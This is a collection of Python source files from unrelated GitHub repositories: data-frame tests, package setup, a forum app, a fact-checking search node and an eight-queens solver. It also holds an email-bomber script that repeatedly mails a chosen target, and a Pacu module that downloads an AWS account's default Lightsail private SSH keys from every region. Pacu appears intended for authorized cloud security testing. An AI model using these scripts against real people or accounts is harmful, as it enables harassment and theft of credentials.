pdf.groupby(pkey)["a"].shift().sort_index(), almost=True, ) self.assert_eq( kdf.groupby(kkey)[["a"]].shift().sort_index(), pdf.groupby(pkey)[["a"]].shift().sort_index(), almost=True, ) def test_fillna(self): pdf = pd.DataFrame( { "A": [1, 1, 2, 2] * 3, "B": [2, 4, None, 3] * 3, "C": [None, None, None, 1] * 3, "D": [0, 1, 5, 4] * 3, } ) pkey = pd.Series([1, 1, 2, 2] * 3) kdf = ks.from_pandas(pdf) kkey = ks.from_pandas(pkey) self.assert_eq( kdf.groupby(kkey).fillna(0).sort_index(), pdf.groupby(pkey).fillna(0).sort_index(), almost=True, ) self.assert_eq( kdf.groupby(kkey)["C"].fillna(0).sort_index(), pdf.groupby(pkey)["C"].fillna(0).sort_index(), almost=True, ) self.assert_eq( kdf.groupby(kkey)[["C"]].fillna(0).sort_index(), pdf.groupby(pkey)[["C"]].fillna(0).sort_index(), almost=True, ) self.assert_eq( kdf.groupby(kkey).fillna(method="bfill").sort_index(), pdf.groupby(pkey).fillna(method="bfill").sort_index(), almost=True, ) self.assert_eq( kdf.groupby(kkey)["C"].fillna(method="bfill").sort_index(), pdf.groupby(pkey)["C"].fillna(method="bfill").sort_index(), almost=True, ) self.assert_eq( kdf.groupby(kkey)[["C"]].fillna(method="bfill").sort_index(), pdf.groupby(pkey)[["C"]].fillna(method="bfill").sort_index(), almost=True, ) self.assert_eq( kdf.groupby(kkey).fillna(method="ffill").sort_index(), pdf.groupby(pkey).fillna(method="ffill").sort_index(), almost=True, ) self.assert_eq( kdf.groupby(kkey)["C"].fillna(method="ffill").sort_index(), pdf.groupby(pkey)["C"].fillna(method="ffill").sort_index(), almost=True, ) self.assert_eq( kdf.groupby(kkey)[["C"]].fillna(method="ffill").sort_index(), pdf.groupby(pkey)[["C"]].fillna(method="ffill").sort_index(), almost=True, ) ```
{ "source": "90michaeltran/usbinfo", "score": 2 }
#### File: 90michaeltran/usbinfo/setup.py ```python import platform from setuptools import setup PKG_NAME = 'usbinfo' PKG_VERSION_MAJOR = 1 PKG_VERSION_MINOR = 0 PKG_VERSION_MICRO = 4 PKG_VERSION = '{major}.{minor}.{micro}'.format( major=PKG_VERSION_MAJOR, minor=PKG_VERSION_MINOR, micro=PKG_VERSION_MICRO) PKG_AUTHOR = ', '.join(['<NAME>', '<NAME>']) PKG_AUTHOR_EMAIL = ', '.join(['<EMAIL>', '<EMAIL>']) PKG_DESC = 'Module for introspecting USB devices on a system' PKG_LONG_DESC = """ {pkg} is a Python module for performing introspection on endpoints attached to the USB subsystems. {pkg} allows scripts to access information about those endpoints such as vendor and product ID, manufacturer and product names, serial numbers, and character device files. {pkg} is eventually intended to be portable across as many platforms that Python itself is ported to. """.format(pkg=PKG_NAME) def main(): setup_data = dict( name=PKG_NAME, version=PKG_VERSION, packages=['usbinfo'], author=PKG_AUTHOR, author_email=PKG_AUTHOR_EMAIL, description=PKG_DESC, long_description=PKG_LONG_DESC, license='Apache 2 license', platforms=['Linux', 'Darwin'], classifiers = [ 'Development Status :: 5 - Production/Stable', 'Environment :: Console', 'Intended Audience :: Developers', 'Intended Audience :: Manufacturing', 'Intended Audience :: Science/Research', 'Intended Audience :: Telecommunications Industry', 'License :: OSI Approved :: Apache Software License', 'Operating System :: MacOS :: MacOS X', 'Operating System :: POSIX :: Linux', 'Programming Language :: Python', 'Programming Language :: Python :: 2.6', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Topic :: Software Development', 'Topic :: Software Development :: Libraries :: Python Modules', 'Topic :: Software Development :: Testing', 'Topic :: System', 'Topic :: System :: Shells', 'Topic :: Terminals', ], install_requires=[], entry_points={ 'console_scripts': [ 'usbinfo = usbinfo.__main__:main' ] } ) if platform.system() == 'Linux': setup_data['install_requires'].append('pyudev') setup(**setup_data) if __name__ == '__main__': main() ```
{ "source": "90sled/nmappy", "score": 3 }
#### File: 90sled/nmappy/topports.py ```python import sys, csv def read_services(nmap_services_file): sfile = csv.reader(open(nmap_services_file, 'r'), dialect='excel-tab') services = [] for s in sfile: if not str(s[0]).startswith('#'): services.append((s[1], s[0], s[2])) return sorted(services, key=lambda s: s[2], reverse=True) def main(): if len(sys.argv) == 1: print 'usage: topports.py [top # of ports] [optional: tcp|udp]' print 'example: topports.py 10 tcp\n' print 'TopPorts v1.0 ( https://github.com/bitsadmin/nmappy/ )' return -1 max = 10 type = 'tcp' if len(sys.argv) > 1: max = int(sys.argv[1]) if len(sys.argv) > 2: type = sys.argv[2] # If needed, adjust to path of 'nmap-services' file # In Kali: /usr/share/nmap/nmap-services services = read_services('nmap-services') services = filter(lambda s: s[0].endswith(type), services) print ','.join([s[0].split('/')[0] for s in services[0:max]]) if __name__ == '__main__': main() ```
{ "source": "910JQK/linuxbar", "score": 2 }
#### File: 910JQK/linuxbar/config.example.py ```python import os DB_WILDCARD = '*' # SQLite = *, others = % DEFAULT_CONFIG = { 'site_name': 'Linuxbar', 'site_url': 'http://127.0.0.1:5000', 'mail_addr': '<EMAIL>', 'count_topic': '30', 'count_post': '25', 'count_item': '15' } PREFIX_ENABLED = False PREFIX = '/linuxbar' LOCALE = 'zh_CN' DEBUG = True SECRET_KEY = b'\<KEY>' INACTIVE_USER_LIFETIME = 30 # minutes TOKEN_LIFETIME = 20 # minutes SUMMARY_LENGTH = 90 # in [4, 128] (128 = Topic.summary.max_length / 4) THUMBNAIL_MAX_HEIGHT = 96 # pixels BAN_DAYS = [1, 3, 10, 30, 100] LINK_PROTOCOLS = ['http', 'https', 'ftp'] TIEBA_COMP = False TIEBA_SYNC_ON = False TIEBA_SYNC_KW = 'linux' TIEBA_SYNC_INTERVAL = 300 TIEBA_SYNC_DELAY = 10 TIEBA_SYNC_OFFSET = 7 TIEBA_SYNC_PENDING_MAX = 15 TIEBA_SYNC_P = [ 1.0, # probability of sync when the topic list is accessed 0.5, # a topic 0.2 # a post ] TIEBA_SUBMIT_URL = 'http://tieba.baidu.com/mo/m/submit' TIEBA_M_URL = 'http://tieba.baidu.com/mo/m' TIEBA_FLR_URL = 'http://tieba.baidu.com/mo/m/flr' TIEBA_TIMG_URL = 'http://m.tiebaimg.com/timg?wapp&quality=100&size=b2000_2000' TIEBA_EMOTICON_URL = 'http://tb2.bdstatic.com/tb/editor/images/' CODE_BEGIN = '/***#' CODE_END = '#***/' PID_SIGN = 'p#' TID_SIGN = 't#' INLINE_CODE_SIGN = '`' # a single char NOTIFICATION_SIGN = '@' # a single char IMAGE_SIGN = '%%' FACE_SIGN = '#' IMAGE_LIMIT = 15 FACE_LIMIT = 20 FORMAT_SIGN = '**' FORMAT_DEFAULT = '*' # a single char FORMATS = { '*': 'b', '~': 'i', '!': 'del' # a single char: tag name } RICHTEXT_INFO = ''' <p><b>Bold</b>: <code>***bold**</code> or <code>**bold**</code></p> <p><i>Italic</i>: <code>**~italic**</code></p> <p><del>Mask</del>: <code>**!Mask**</code></p> <p><code>Inline Code</code>: <code>`Inline Code`</code></p> <p>Image: <code>%%hash</code></p> <p>Face: <code>#name</code></p> <div class="highlight"><pre> Code Box: /***# language code code code #***/ </pre> </div> ''' RICHTEXT_INFO_JSON = ''' { "formats": [ ["bold", "**", "**"], ["italic", "**~", "**"], ["mask", "**!", "**"], ["inline_code", "`", "`"] ], "image_prefix": "%%", "face_prefix": "#", "code_prefix": "/***#", "code_suffix": "#***/" } ''' UPLOAD_FOLDER = 'upload' MAX_UPLOAD_SIZE = 7 * 1024 * 1024 IMAGE_MIME = {'png': 'image/png', 'jpeg': 'image/jpeg', 'gif': 'image/gif'} def assert_config(): assert os.path.isdir(UPLOAD_FOLDER) assert SUMMARY_LENGTH in range(4, 128+1) assert len(INLINE_CODE_SIGN) == 1 assert len(NOTIFICATION_SIGN) == 1 assert len(FORMAT_DEFAULT) == 1 for sign in FORMATS: assert len(sign) == 1 ``` #### File: 910JQK/linuxbar/manage.py ```python import re import os import json from getpass import getpass from app import run from models import User, Profile, init_db from utils import now from argparse import ArgumentParser def create_administrator(): mail = input('Email address: ') name = input('Nickname: ') password = getpass('Password: ') confirm = getpass('Confirm password: ') if password != confirm: print('Passwords are inconsistent.') return else: conflict = User.select().where( (User.mail == mail.lower()) | (User.name == name) ) if conflict: print('Conflict detected. Failed to create account.') return user = User( mail = mail.lower(), name = name, level = 2, date_register = now(), is_active = True ) user.set_password(password) user.save(force_insert=True) Profile.create(user=user) print('New administrator created successfully.') def create_post_move_account(): name = input('Nickname: ') password = getpass('Password: ') confirm = getpass('Confirm password: ') if password != confirm: print('Passwords are inconsistent.') return else: user = User( mail = 'move_post@foobar', name = name, date_register = now(), is_active = True ) user.set_password(password) user.save(force_insert=True) Profile.create(user=user) def gen_js_trans_file(): messages = {} TRANS_STR = re.compile('_\(\'([^\']+)') for filename in os.listdir('static'): if filename.endswith('.js'): path = os.path.join('static', filename) f = open(path) for line in f.readlines(): for match in TRANS_STR.finditer(line): msgid = match.expand('\\1') messages[msgid] = '' msg_str = json.dumps(messages) msg_str = msg_str.replace('{', '{\n') msg_str = msg_str.replace(',', ',\n') msg_str = msg_str.replace('}', '\n}') print(msg_str) def main(): commands = { 'run': run, 'init-db': init_db, 'create-admin': create_administrator, 'create-move': create_post_move_account, 'gen-js-trans': gen_js_trans_file } parser = ArgumentParser() parser.add_argument( 'cmd', metavar='Command', help='(%s)' % '|'.join(list(commands)) ) args = parser.parse_args() if commands.get(args.cmd): commands[args.cmd]() else: print('Invalid command') if __name__ == '__main__': main() ``` #### File: 910JQK/linuxbar/utils.py ```python import os import re import sys import random import hashlib import datetime import threading import gettext from math import log from html import escape from urllib.parse import quote, unquote from config import LOCALE import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart import base64 from Crypto import Random from Crypto.Cipher import AES TOKEN_CHARS = '<KEY>' now = datetime.datetime.now locale_path = os.path.join( os.path.dirname( os.path.realpath( __file__ ) ), 'translations' ) translation = gettext.translation('messages', locale_path, languages=[LOCALE]) def _(string, string_pl=None, n=None): if not string_pl: return translation.gettext(string) else: return translation.ngettext(string, string_pl, n) def info(*args, **kwargs): print(*args, file=sys.stderr, **kwargs) def sha256(string): return hashlib.sha256(bytes(string, encoding='utf8')).hexdigest() def md5(string): return hashlib.md5(bytes(string, encoding='utf8')).hexdigest() def gen_token(): return ''.join(random.choice(TOKEN_CHARS) for i in range(0, 16)) def url_quote(text): return quote(text, encoding='utf8') def find_record_all(table, *args, **kwargs): query = table.select().where( *((getattr(table, field) == value) for field, value in kwargs.items()) ) for record in query: yield record def find_record(table, *args, **kwargs): try: return find_record_all(table, *args, **kwargs).__next__() except StopIteration: return None def path_get_level(path): return (len(path.split('/')) - 2) def path_get_padding(level): # f(0) = 0, f(4) = 0.8 + 2.2 = 3 return 0.8 + (2.2/log(1+4))*log(1+level) def filter_append_time(string): return string + '?t=' + str(now().timestamp()) def get_color(string, saturation, lightness): hash_value = sha256(string) n256 = int(hash_value[0:2], 16) hue = int(round(360*(n256/256))) return 'hsl(%d, %d%%, %d%%)' % (hue, saturation, lightness) def format_date(date, detailed=False): # behaviour of this function must be consistent with the front-end if detailed: return date.isoformat(' '); delta = int(round((datetime.datetime.now() - date).total_seconds())) if delta < 60: return _('just now') elif delta < 3600: minutes = delta // 60 if minutes == 1: return _('a minute ago') else: return _('%d minutes ago') % minutes elif delta < 86400: hours = delta // 3600 if hours == 1: return _('an hour ago') else: return _('%d hours ago') % hours # 604800 = 86400*7 elif delta < 604800: days = delta // 86400 if days == 1: return _('a day ago') else: return _('%d days ago') % days # 2629746 = 86400*(31+28+97/400+31+30+31+30+31+31+30+31+30+31)/12 elif delta < 2629746: weeks = delta // 604800 if weeks == 1: return _('a week ago') else: return _('%d weeks ago') % weeks # 31556952 = 86400*(365+97/400) elif delta < 31556952: months = delta // 2629746 if months == 1: return _('a month ago') else: return _('%d months ago') % months else: years = delta // 31556952 if years == 1: return _('a year ago') else: return _('%d years ago') % years class EmailThread(threading.Thread): def __init__(self, subject, addr_from, addr_to, content, html=''): if(html): msg = MIMEMultipart('alternative') msg_plaintext = MIMEText(content, 'plain') msg_html = MIMEText(html, 'html') msg.attach(msg_html) msg.attach(msg_plaintext) msg = msg else: msg = MIMEText(content, 'plain') msg['Subject'] = subject msg['From'] = addr_from msg['To'] = addr_to self.msg = msg threading.Thread.__init__(self) def run (self): smtp = smtplib.SMTP('localhost') smtp.send_message(self.msg) smtp.quit() def send_mail(subject, addr_from, addr_to, content, html=''): EmailThread(subject, addr_from, addr_to, content, html).start() class AESCipher(object): # http://stackoverflow.com/questions/12524994 def __init__(self, key): self.bs = 32 self.key = hashlib.sha256(key.encode(encoding='utf8')).digest() def encrypt(self, raw): raw = self._pad(quote(raw)) iv = Random.new().read(AES.block_size) cipher = AES.new(self.key, AES.MODE_CBC, iv) return base64.b64encode(iv + cipher.encrypt(raw)) def decrypt(self, enc): enc = base64.b64decode(enc) iv = enc[:AES.block_size] cipher = AES.new(self.key, AES.MODE_CBC, iv) return unquote(self._unpad(cipher.decrypt(enc[AES.block_size:])).decode('utf-8')) def _pad(self, s): return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs) @staticmethod def _unpad(s): return s[:-ord(s[len(s)-1:])] ```
{ "source": "911Steven/Table-Fact-Checking", "score": 3 }
#### File: Table-Fact-Checking/code/Node.py ```python import pandas import numpy import copy from APIs import APIs class Node(object): def __init__(self, rows, memory_str, memory_num, header_str, header_num, must_have, must_not_have): # For intermediate results self.memory_str = memory_str self.memory_num = memory_num self.memory_bool = [] self.header_str = header_str self.header_num = header_num self.trace_str = [v for k, v in memory_str] self.trace_num = [v for k, v in memory_num] # For intermediate data frame self.rows = [("all_rows", rows)] self.cur_str = "" self.cur_strs = [] self.cur_funcs = [] self.must_have = must_have self.must_not_have = must_not_have self.row_counter = [1] #self.str_counter = [0] * len(memory_str) #self.num_counter = [0] * len(memory_num) def done(self): if self.memory_str_len == 0 and self.memory_num_len == 0 and \ self.memory_bool_len == 0 and all([_ > 0 for _ in self.row_counter]): for funcs in self.must_have: if any([f in self.cur_funcs for f in funcs]): continue else: return False return True else: return False @property def tostring(self): print "memory_str:", self.memory_str print "memory_num:", self.memory_num print "header_str:", self.header_str print "header_num:", self.header_num print "trace:", self.cur_str def concat(self, new_str, k): """ if APIs[k]['append']: if self.cur_str: self.cur_str += ";" + new_str else: self.cur_str = new_str else: pass """ func = new_str.split('(')[0] self.cur_funcs.append(func) self.cur_strs.append(new_str) #if func == 'max': # self.must_not_have.extend(['max', 'argmax']) #if func == 'min': # self.must_not_have.extend(['min', 'argmin']) def exist(self, command): return command in self.cur_strs def clone(self, command, k): tmp = copy.deepcopy(self) tmp.concat(command, k) return tmp @property def memory_str_len(self): return len(self.memory_str) @property def memory_num_len(self): return len(self.memory_num) @property def tmp_memory_num_len(self): return len([_ for _ in self.memory_num if "tmp_" in _ and _ != "tmp_none"]) #return len(self.memory_num) @property def tmp_memory_str_len(self): return len([_ for _ in self.memory_str if "tmp_" in _]) @property def memory_bool_len(self): return len(self.memory_bool) @property def row_num(self): return len(self.rows) - 1 @property def hash(self): return hash(frozenset(self.cur_strs)) """ cache_hash = hash(tuple(self.memory_str + self.memory_num + self.memory_bool \ + self.header_str + self.header_num)) if self.row_num: r = [] for row in self.rows[1:]: r.append(len(row)) r.append(row.iloc[0][0]) row_hash = hash(tuple(r)) return cache_hash + row_hash else: return cache_hash """ def append_result(self, command, r): self.cur_str = "{}={}".format(command, r) def append_bool(self, r): if self.cur_str != "": self.cur_str += ";{}".format(r) else: self.cur_str = "{}".format(r) def get_memory_str(self, i): return self.memory_str[i][1] def get_memory_num(self, i): return self.memory_num[i][1] def add_memory_num(self, header, val, command): if isinstance(val, int) or isinstance(val, float): if type(val) == type(1) or type(val) == type(1.2): self.memory_num.append((header, val)) else: self.memory_num.append((header, numpy.asscalar(val))) self.trace_num.append(command) else: raise ValueError("type error") def add_memory_bool(self, header, val): if isinstance(val, bool): self.memory_bool.append((header, val)) else: raise ValueError("type error") def add_memory_str(self, header, val, command): if isinstance(val, unicode) or isinstance(val, str): self.memory_str.append((header, val)) self.trace_str.append(command) else: raise ValueError("type error") def add_header_str(self, header): self.header_str.append(header) def add_header_num(self, header): self.header_num.append(header) def add_rows(self, header, val): if isinstance(val, pandas.DataFrame): #for row_h, row in self.rows: # if len(row) == len(val) and row.iloc[0][0] == val.iloc[0][0]: # return if any([row_h == header for row_h, row in self.rows]): return self.rows.append((header, val.reset_index(drop=True))) self.row_counter.append(0) else: raise ValueError("type error") def inc_row_counter(self, i): self.row_counter[i] += 1 def delete_memory_num(self, *args): for i, arg in enumerate(args): del self.memory_num[arg - i] del self.trace_num[arg - i] def delete_memory_str(self, *args): for i, arg in enumerate(args): del self.memory_str[arg - i] del self.trace_str[arg - i] def delete_memory_bool(self, *args): for i, arg in enumerate(args): del self.memory_bool[arg - i] #def delete_header_num(self, i): # del self.header_num[i] #def delete_header_str(self, i): # del self.header_str[i] def check(self, *args): #print args final = {} for arg in args: if arg == 'row': continue if arg == ['header_str', 'string']: if any([k is not None for k, v in self.memory_str]): continue else: return False if arg == ['header_num', 'number']: if any([k is not None for k, v in self.memory_num]): continue else: return False if arg == 'string': if len(self.memory_str) > 0: continue else: return False if arg == 'number': if len(self.memory_num) > 0: continue else: return False if arg == 'header_str': if len(self.header_str) > 0: continue else: return False if arg == 'header_num': if len(self.header_num) > 0: continue else: return False return True ```
{ "source": "911whatsyouremergency/email-bomber", "score": 3 }
#### File: 911whatsyouremergency/email-bomber/main.py ```python import configparser import smtplib import keyboard import threading from rich import print from email.mime.text import MIMEText def invert_event(key_event): if start_event.is_set(): start_event.clear() else: start_event.set() # S listening def listen_S(): keyboard.on_release_key(key='S', callback=invert_event) # main while True: try: print(""" 1 - Bomb an [cyan]email[/cyan] 2 - Change [cyan]email service[/cyan] """) choice = int(input(">>> ")) except ValueError: print("[bold red]Please, type number.") else: if choice == 1: # taking information from config.ini config = configparser.ConfigParser() config.read("config.ini") sender_email = config["Email"]["email"] sender_password = config["Email"]["password"] sender_host = config["Email"]["host"] sender_port = config["Email"]["port"] # taking other information by input target_email = input("Email of your target?: ") text = input("Text?: ") # connecting to SMTP print("\n[yellow]Trying to connect via a secure connection...", end=" ") smtpObj = smtplib.SMTP(sender_host, sender_port) smtpObj.starttls() print("[bold green]success!\n") # waiting for pushing button print("[bold yellow]Waiting for pushing 'S' button...\n") start_event = threading.Event() threading.Thread(target=listen_S).run() start_event.wait() total_emails = 0 # boom boom while start_event.is_set(): try: print("[yellow]Trying to send an email...", end=" ") smtpObj.login(sender_email, sender_password) smtpObj.sendmail(sender_email, target_email, text) print("[bold green]success!") total_emails += 1 # errors except smtplib.SMTPAuthenticationError: print("[bold red]wrong email or password (or you forget about turning on less secure apps in your google account)! [ERROR]") break except smtplib.SMTPRecipientsRefused: print("[bold red]invalid resiever's email [ERROR]") break except UnicodeError: msg = MIMEText(text, 'plain', 'utf-8') smtpObj.sendmail( sender_email, target_email, msg.as_string()) print("success!") except: print(f"[bold red]some error occured [ERROR]") break # while button 'S' pushed in 2 time print(f"\n[bold red]Stopped by user. {total_emails} emails currently sent.") # changing the email service elif choice == 2: print("1 - [cyan]Gmail[/cyan] (default)\n2 - [cyan]Mail.ru[/cyan]\n3 - [cyan]Yahoo![/cyan]\n4 - [cyan]AOL[/cyan]\n5 - [red]Back[/red]\n") while True: try: service = int(input(">>> ")) except ValueError: print("[bold red]Please, type number.") else: if service == 1: host = "smtp.gmail.com" port = "587" all_ok = True elif service == 2: host = "smtp.mail.ru" port = "465" all_ok = True elif service == 3: host = "smtp.mail.yahoo.com" port = "465" all_ok = True elif service == 4: host = "smtp.aol.com" port = "587" all_ok = True elif service == 5: print("[bold red]Aborting...") break else: print("[bold red]Type 1 or 2 only!") all_ok = False if all_ok: # writing email service into the config.ini config = configparser.ConfigParser() config.read('config.ini') config['Email']['host'] = host config['Email']['port'] = port with open('config.ini', 'w') as configfile: config.write(configfile) print("[bold green]Success!") else: print("[bold red]Type 1, 2 or 3 only!") ```
{ "source": "91299792458/pacu", "score": 3 }
#### File: modules/lightsail__download_ssh_keys/main.py ```python import argparse from pathlib import Path module_info = { # Name of the module (should be the same as the filename) 'name': 'lightsail__download_ssh_keys', # Name and any other notes about the author 'author': '<NAME> of Rhino Security Labs', # Category of the module. Make sure the name matches an existing category. 'category': 'EXPLOIT', # One liner description of the module functionality. This shows up when a user searches for modules. 'one_liner': 'Downloads Lightsails default SSH key pairs.', # Description about what the module does and how it works 'description': 'This module downloads the accounts default public and private SSH keys for AWS Lightsail.', # A list of AWS services that the module utilizes during its execution 'services': ['Lightsail'], # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular. 'prerequisite_modules': [], # Module arguments to autocomplete when the user hits tab 'arguments_to_autocomplete': [], } parser = argparse.ArgumentParser(add_help=False, description=module_info['description']) def main(args, pacu_main): ###### Don't modify these. They can be removed if you are not using the function. session = pacu_main.get_active_session() args = parser.parse_args(args) print = pacu_main.print get_regions = pacu_main.get_regions ###### summary_data = {'region_key_pairs': []} regions = get_regions('lightsail') dl_path = Path.cwd() / 'sessions' / session.name / 'downloads' / 'download_lightsail_ssh_keys' if not dl_path.exists(): dl_path.mkdir() summary_data['dl_path'] = str(dl_path.relative_to(Path.cwd() / 'sessions' / session.name)) for region in regions: print(' Downloading default keys for {}...'.format(region)) cur_path = dl_path / region if not cur_path.exists(): cur_path.mkdir() client = pacu_main.get_boto3_client('lightsail', region) downloaded_keys = client.download_default_key_pair() restructured_keys = { 'publicKey': downloaded_keys['publicKeyBase64'], 'privateKey': downloaded_keys['privateKeyBase64'] } private_path = cur_path / 'default' with private_path.open('w', encoding='utf-8') as key_file: key_file.write(restructured_keys['privateKey']) public_path = cur_path / 'default.pub' with public_path.open('w', encoding='utf-8') as key_file: key_file.write(restructured_keys['publicKey']) summary_data['region_key_pairs'].append(region) print('\n{} completed.\n'.format(module_info['name'])) return summary_data def summary(data, pacu_main): out = ' Keys downloaded to:\n' out += ' ' + data['dl_path'] + '\n' out += ' Downloaded Key Pairs for the following regions: \n' for region in sorted(data['region_key_pairs']): out += ' {}\n'.format(region) return out ```
{ "source": "913360158/githubdemo", "score": 2 }
#### File: githubdemo/handler/handlerdb.py ```python debian = { "project": "successful :model is running" } def produce(action_name): global debian try: handler = debian.get(action_name) except KeyError as e: print(str(e)) handler = "NotFindModel" return handler ```
{ "source": "913982779/eight_queens", "score": 2 }
#### File: eight_queens/mylib/queens_lib.py ```python # \file queens_lib.py # \brief 八皇后问题算法库 # \author 1851738杨皓冬 # \version 6.0 # \date 2020-11-06 # # ----------------------------------------------------------------------------- # # ----------------------------------------------------------------------------- # 文件修改历史: # <时间> | <版本> | <作者> | # 2020-10-31 | v1.0 | 1851738杨皓冬 | # 2020-11-01 | v2.0 | 1851738杨皓冬 | # 2020-11-03 | v3.0 | 1851738杨皓冬 | # 2020-11-04 | v4.0 | 1851738杨皓冬 | # 2020-11-05 | v5.0 | 1851738杨皓冬 | # 2020-11-06 | v6.0 | 1851738杨皓冬 | # ----------------------------------------------------------------------------- # ******************************************************************************/ from collections import Counter import random import math #----------------------------------------------------------------------------------------------------------# class Queens: queens = 0 col_axis = [] row_axis = [] h_value = 0 #启发式函数值 loc_opt_flag = 0 #局部最优标签,当flag=1且h_value>0时即认为陷入局部最优 K = 0 #局部束算法的K值 G = 0 #遗传算法的种群数量 lb_init_dict = None #局部束算法的初始K状态 ga_init_dict = None #遗传算法的初始G状态 mutation_rate = 0.1 #遗传变异概率 #-------------------------模拟退火算法参数--------------------------# T_n = 0 #模拟退火温度 T_MAX = 10000 #控温上限 T_lamda = 0.85 #温度转移迭代因子 #------------------------------------------------------------------# # @breif:构造函数 # @param[in]:queens->皇后问题的皇后数量 # @retval:None def __init__(self,queens): self.queens = queens self.col_axis = [i for i in range(1,queens+1)] self.row_axis = [random.randint(1,queens) for _ in range(queens)] self.h_value = self.__h_x(self.row_axis,self.col_axis) self.T_n = self.T_MAX #模拟退火初始温度 self.K = 8 #预设局部束K值,可更改 self.G = 14 #预设遗传算法G值,可更改,但必须为偶数 self.lb_init_dict = self.__random_explor_k(self.row_axis,self.col_axis,self.K) self.ga_init_dict = self.__random_explor_k(self.row_axis,self.col_axis,self.G) #---------------------封装于内部的私有处理函数-----------------------# # @breif:合并字典 # @param[in]:dic1,dic2 # @retval:dic_new->合并后的字典 # @attention:dic2会覆盖dic1中相同key的元素,这不影响本问题的求解 def __dic_sum(self,dic1,dic2): return {**dic1,**dic2} # @breif:字典正向切片,总共切end-start个 # @param[in]:dic,start,end # @retval:dic_new->切片后的字典 def __dic_cut(self,dict, start, end): temp = list(dict.keys())[start:end] dic_new = {} for i in range(len(temp)): dic_new[temp[i]] = dict.get(temp[i]) return dic_new # @breif:计算组合数 # @param[in]:m,n->组合因子 # @retval:组合数 def __C(self,m,n): if((m>n)|(m<0)|(n<0)): return 0 else: return (self.__factorial(n)/(self.__factorial(m)*self.__factorial(n-m))) # @breif:计算阶乘 # @param[in]:number->数值 # @retval:number的阶乘 def __factorial(self,number): if number <= 1: return 1 else: return number*self.__factorial(number-1) # @breif:根据笛卡尔坐标计算倾斜坐标系 # @param[in]:row_list->纵坐标族,col_list->横坐标族 # @retval:lt2rb_list->从左上到右下的倾斜坐标族,rt2lb_list->从右上到左下的倾斜坐标族 def __cal_inclined_coordinate(self,row_list,col_list): lt2rb_list = [] rt2lb_list = [] for i in range(len(row_list)): lt2rb_list = lt2rb_list+[col_list[i]+row_list[i]-1] rt2lb_list = rt2lb_list+[len(row_list)+row_list[i]-col_list[i]] return lt2rb_list,rt2lb_list # @breif:根据当前局面随机探索一个不劣于当前的节点 # @param[in]:row_list->纵坐标族,col_list->横坐标族 # @retval:new_row_list->新纵坐标族,new_h_value->新的启发函数值 def __random_explor_opt(self,row_list,col_list): h_value = self.__h_x(row_list,col_list) new_row_list = row_list.copy() while(1): i = random.randint(0,len(row_list)-1) j = new_row_list[i] new_row_list[i] = random.randint(1,len(row_list)) new_h_value = self.__h_x(new_row_list,col_list) if(new_h_value<=h_value): break else: new_row_list[i] = j #恢复状态 return new_row_list,new_h_value # @breif:根据当前局面随机探索K个邻域节点,并将这些节点及对应的启发函数值组合成字典返回 # @param[in]:row_list->纵坐标族,col_list->横坐标族,k->要探索的节点数 # @retval:k_node_dic def __random_explor_k(self,row_list,col_list,k): k_node_dic = {} while(1): i = random.randint(0,self.queens-1) j = row_list[i] row_list[i] = random.randint(1,self.queens) k_node_dic[tuple(row_list)] = self.__h_x(row_list,self.col_axis) if(len(k_node_dic)==k): break row_list[i] = j return k_node_dic # @breif:根据横纵坐标数计算启发式函数值 # @param[in]:row_list->纵坐标族,col_list->横坐标族 # @retval:h_value->当前坐标族下的启发函数值 def __h_x(self,row_list,col_list): temp_value = 0 lt2rb_list,rt2lb_list = self.__cal_inclined_coordinate(row_list,col_list) count_dic_row = dict(Counter(row_list)) count_dic_lt2rb,count_dic_rt2lb = dict(Counter(lt2rb_list)),dict(Counter(rt2lb_list)) for value in count_dic_row.values(): temp_value = temp_value+self.__C(2,value) for value in count_dic_lt2rb.values(): temp_value = temp_value+self.__C(2,value) for value in count_dic_rt2lb.values(): temp_value = temp_value+self.__C(2,value) return int(temp_value) # @breif:随机束算法的概率转移函数 # @param[in]:h_value # @retval:bool->返回1则接受向新方向转移,否则不接受 def __random_beam_trans(self,h_value): trans_p = 2**(-h_value) p = random.random() if(p<=trans_p): return 1 else: return 0 # @breif:模拟退火概率转移函数 # @param[in]:T_current->当前温度 # old_h_value->转移前能量,new_h_value->转移后能量 # @retval:bool->返回1则接受向新方向转移,否则不接受 def __simu_anneal_trans(self,T_current,old_h_value,new_h_value): if(new_h_value<=old_h_value): return 1 else: delta = new_h_value - old_h_value p_trans = math.exp(-delta/T_current) #退火概率转移函数 p = random.random() if(p<=p_trans): return 1 else: return 0 # @breif:遗传算法自然选择函数 # @param[in]:population->种群 # @retval:selected_population->经过自然选择后的种群 def __ga_selection(self,population): select_rate = list(population.values()) for i in range(len(select_rate)): select_rate[i] = 2**(-select_rate[i]) selected_population = {} while(1): j = random.randint(0,len(select_rate)-1) p = random.random() if(p <= select_rate[j]): selected_population[list(population.keys())[j]] = list(population.values())[j] if(len(selected_population) == self.G): break return selected_population # @breif:遗传算法杂交函数 # @param[in]:selected_population->经过自然选择的种群 # @retval:crossover_population->杂交后的种群 def __ga_crossover(self,selected_population): crossover_population = {} while(1): #----------------- 随机确定亲代 ----------------------# i = random.randint(1,len(selected_population)-1) father = list(list(selected_population.keys())[i]) mother = list(list(selected_population.keys())[i-1]) #----------------------------------------------------# #----------------- 开始随机杂交 ----------------------# j = random.randint(0,self.queens-1) son_1 = mother[0:j+1] + father[j+1:self.queens] son_2 = father[0:j+1] + mother[j+1:self.queens] h_son_1 = self.__h_x(son_1,self.col_axis) h_son_2 = self.__h_x(son_2,self.col_axis) #----------------- 随机杂交结束 ----------------------# crossover_population[tuple(son_1)] = h_son_1 if(len(crossover_population) == self.G): break crossover_population[tuple(son_2)] = h_son_2 if(len(crossover_population) == self.G): break return crossover_population # @breif:遗传算法变异函数 # @param[in]:crossover_population->杂交的种群 # @retval:mutation_population->随机变异后的种群 def __ga_mutation(self,crossover_population): mutation_population = {} while(1): for i in range(len(crossover_population)): p = random.random() #发生变异 if(p<=self.mutation_rate): j = random.randint(0,self.queens-1) temp_row_list = list(list(crossover_population.keys())[i]) temp_row_list[j] = random.randint(1,self.queens) mutation_population[tuple(temp_row_list)] = self.__h_x(temp_row_list,self.col_axis) else: mutation_population[list(crossover_population.keys())[i]] = list(crossover_population.values())[i] if(len(mutation_population)==self.G): break 